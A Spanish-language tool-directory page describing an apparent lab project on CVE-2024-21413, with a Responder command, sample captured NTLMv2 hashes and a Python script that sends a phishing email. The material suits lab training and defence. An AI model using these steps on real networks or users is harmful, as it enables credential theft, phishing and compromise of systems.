Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Project-NTLM-Hash-Capture-and-Phishing-Email-Exploitation-for-CVE-2024-21413 — Demuestra la captura de hashes NTLM a través de Responder y la ejecución de correos electrónicos de phishing que explotan CVE-2024-21413 para comprometer sistemas. | Kitploit
Herramientas/GitHubGitHub/artemcyberlab/project-ntlm-hash-capture-and-phishing-email-exploitation-for-cve-2024-21413
OSINT (Inteligencia de Fuentes Abiertas)Descifrado de ContraseñasReconocimientoExplotaciónPhishingIngeniería SocialAprendizaje y EducaciónLabs y Práctica

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
GitHub
artemcyberlab/project-ntlm-hash-capture-and-phishing-email-exploitation-for-cve-2024-21413

Project-NTLM-Hash-Capture-and-Phishing-Email-Exploitation-for-CVE-2024-21413

Demuestra la captura de hashes NTLM a través de Responder y la ejecución de correos electrónicos de phishing que explotan CVE-2024-21413 para comprometer sistemas.

Ver Repositorio
8hace 1 añoAún no revisado

Objetivo del Proyecto: El proyecto fue creado para demostrar el uso de varias herramientas para capturar hashes NTLM de usuarios en una red y para ejecutar ataques de phishing mediante correo electrónico. Esto muestra cómo se pueden explotar las vulnerabilidades de autenticación de red y los métodos de phishing para comprometer sistemas.

Descripción del Proceso

  1. Captura de Hashes NTLM usando Responder Inicialmente, utilicé la herramienta Responder para capturar hashes de autenticación a través de la red. Responder permite interceptar consultas como LLMNR, NBT-NS y MDNS para recolectar hashes NTLM de los usuarios. Este es un paso importante para ataques dirigidos a obtener acceso a sistemas usando hashes capturados.

Ejecuté el siguiente comando para iniciar Responder:

root@ip-10-10-192-145:~# sudo responder -I ens5

Configuré Responder para que escuchara en la interfaz ens5. Inmediatamente comenzó a interceptar solicitudes de autenticación, permitiéndome ver hashes NTLM de usuarios en la red, como THM-MONIKERLINK\tryhackme y WORKGROUP\Administrator. Así es como se veía la salida al capturar los hashes:

[SMB] NTLMv2-SSP Client : ::ffff:10.10.251.212 [SMB] NTLMv2-SSP Username : THM-MONIKERLINK\tryhackme [SMB] NTLMv2-SSP Hash : tryhackme::THM-MONIKERLINK:0b8bfa4ac2e8a954:4E86E98E55FBE019FB31815DDD4445DB

Estos hashes pueden luego usarse para ataques como fuerza bruta o ataques de hash.

  1. Correos de Phishing con Exploit A continuación, creé un correo de phishing que contenía un enlace a un archivo malicioso. Usando un script de Python con la librería smtplib, envié el correo a la dirección de la víctima. El correo incluía un enlace HTML que parecía seguro pero en realidad llevaba a un archivo diseñado para explotar una vulnerabilidad.

El enlace de phishing en el correo se veía así:

Click me

Aquí está el script completo de Python utilizado para enviar el correo de phishing:

import smtplib from email.mime.text import MIMEText from email.mime.multipart import MIMEMultipart from email.utils import formataddr

sender_email = '[email protected]' receiver_email = '[email protected]' password = input("Enter your attacker email password: ")

html_content = """\

Click me

"""

message = MIMEMultipart() message['Subject'] = "CVE-2024-21413" message["From"] = formataddr(('CMNatic', sender_email)) message["To"] = receiver_email

msgHtml = MIMEText(html_content, 'html') message.attach(msgHtml)

server = smtplib.SMTP('10.10.251.212 ', 25) server.ehlo()

try: server.login(sender_email, password) except Exception as err: print(err) exit(-1)

try: server.sendmail(sender_email, [receiver_email], message.as_string()) print("\nEmail delivered") except Exception as error: print(error) finally: server.quit()

Este script envía un correo con un enlace malicioso, que podría explotar potencialmente la vulnerabilidad CVE-2024-21413.

Resultados Como resultado, pude demostrar dos aspectos clave:

Capturar hashes NTLM usando la herramienta Responder, que es un paso crucial para atacar la autenticación de red.

Phishing y explotación de vulnerabilidades a través de correo electrónico usando el script de Python. El envío de correos de phishing con enlaces maliciosos puede engañar a los usuarios y llevar al compromiso del sistema.

Este proyecto mostró cómo las vulnerabilidades de red y los ataques de phishing pueden ser explotados para obtener acceso a sistemas. También destacó la importancia de defenderse contra tales ataques mediante métodos de autenticación sólidos y filtrado de tráfico de correo electrónico.

Descargar herramienta